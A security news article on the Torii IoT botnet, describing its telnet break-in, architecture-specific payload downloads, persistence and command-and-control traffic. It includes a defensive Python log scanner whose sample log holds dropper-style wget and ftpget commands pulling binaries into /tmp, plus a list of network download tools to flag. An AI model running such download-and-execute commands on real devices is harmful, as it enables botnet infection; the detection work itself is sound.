Saturday, May 18, 2024

Torii Botnet – A New Sophisticated IoT Botnet in the Wild – More Powerful Than Mirai

A highly sophisticated botnet, Torii, has been discovered spreading with more advanced techniques than the famous Mirai botnet, and with different functionality from Mirai.

Malware authors developed the Torii botnet with greater stealth and persistence capabilities. Unlike other botnets, it does not perform DDoS attacks or other attacks that take down the connected devices.

Instead, it compromises the victim’s network, steals sensitive information, and executes commands to perform various malicious activities through strong layered communication.

Researchers discovered that the Torii botnet supports a wide range of target architectures, including MIPS, ARM, x86, x64, PowerPC, SuperH, etc.

It was first caught in a telnet honeypot run by a security researcher, @VessOnSecurity, who said the telnet attacks had been coming to his honeypot from Tor exit nodes, which is why it was named “Torii”.

Torii Botnet Infection Process

Initially, the attack process starts with a telnet attack on weak credentials, followed by the execution of a shell script that is more sophisticated than those used by normal botnets.

The script then tries to find out the architecture of the target and attempts to download the payload for that device. Interestingly, Torii supports various device architectures, including x86_64, x86, ARM, MIPS, Motorola 68k, SuperH, and PPC.

It mainly attempts to compromise a wide range of IoT devices based on common architectures, and it uses several commands to download the binary payloads.

The Torii botnet uses a bash script to redirect the infected victim’s device to the malware-hosting server.

Once the malware finds out the architecture of the target device, it downloads and executes the appropriate binary from the server. This payload serves only to download the second-stage payload.
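The download behaviour described above can be hunted for in telnet honeypot or device shell logs. The following is an added example, not code from Avast's analysis or from the malware: it flags sessions that retry downloads with several tools or for several architectures. The log format, the downloader list, the architecture tokens in file names, and the thresholds are all assumptions.

```python
import re
from collections import defaultdict

# Assumed list of download utilities found on embedded Linux / BusyBox.
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
# Architectures named in the article; these filename tokens are assumptions.
ARCH_TOKENS = {"x86_64", "x86", "arm", "mips", "m68k", "sh4", "ppc"}

# Constructed sample log, one line per command: "<session> <source-ip> <command>"
SAMPLE_LOG = """\
s1 203.0.113.7 cat /proc/cpuinfo
s1 203.0.113.7 wget http://198.51.100.9/p/mips -O /tmp/.x
s1 203.0.113.7 busybox ftpget 198.51.100.9 /tmp/.x p/mips
s1 203.0.113.7 wget http://198.51.100.9/p/arm -O /tmp/.x
s2 192.0.2.44 uname -a
s2 192.0.2.44 wget http://192.0.2.80/firmware-update.bin
"""

def suspicious_sessions(log_text, min_tools=2, min_archs=2):
    """Return sessions that retry downloads with several tools or architectures."""
    tools, archs, src = defaultdict(set), defaultdict(set), {}
    for line in log_text.splitlines():
        parts = line.split(maxsplit=2)
        if len(parts) < 3:
            continue  # skip empty or malformed lines
        sid, ip, cmd = parts
        src[sid] = ip
        tokens = set(re.findall(r"[a-z0-9_]+", cmd.lower()))
        used = tokens & DOWNLOADERS
        if used:  # only download commands contribute evidence
            tools[sid] |= used
            archs[sid] |= tokens & ARCH_TOKENS
    return {
        sid: {"src": src[sid], "tools": sorted(tools[sid]), "archs": sorted(archs[sid])}
        for sid in tools
        if len(tools[sid]) >= min_tools or len(archs[sid]) >= min_archs
    }

if __name__ == "__main__":
    for sid, hit in suspicious_sessions(SAMPLE_LOG).items():
        print(sid, hit)
```

A single download with one tool, as in session s2, stays below both thresholds and is not reported.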

Both the first-stage and second-stage payloads use XOR-based encryption. The second-stage payload is also highly persistent: it contains 6 methods to make sure the file remains on the device and always runs.

The second-stage payload also contains the main bot functionality, which communicates with its command & control server to execute commands. It also has features such as anti-debugging techniques, data exfiltration, multi-level encryption of communication, and many other evasion techniques.

According to logs analyzed by Avast, a total of 592 unique clients were downloading files from this server over a period of a few days. It’s important to remember that once the target device receives the payload, it stops connecting to the download server and connects to the CnC server to receive and act on commands.

“Even though our investigation is continuing, it is clear that Torii is an example of the evolution of IoT malware, and that its sophistication is a level above anything we have seen before,” Avast said.

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.
